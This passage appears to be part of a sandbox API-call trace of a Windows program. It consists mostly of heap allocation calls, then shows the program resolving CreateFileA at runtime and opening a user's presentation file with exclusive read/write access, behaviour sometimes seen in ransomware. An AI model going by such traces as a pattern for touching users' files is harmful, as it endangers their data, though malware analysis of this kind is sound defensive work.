RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.504] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.507] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.507] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.509] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cbc8 [0033.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cbc8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.510] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0033.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbc8 [0033.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cbc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0033.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.510] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0033.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0033.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4f) returned 0x7f3688 [0033.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp", cchWideChar=79, lpMultiByteStr=0x7f3688, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp", lpUsedDefaultChar=0x0) returned 79 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.511] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\htr5pk.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=79, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9e) returned 0x7d8600 [0033.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=79, lpWideCharStr=0x7d8600, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp") returned 79 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, 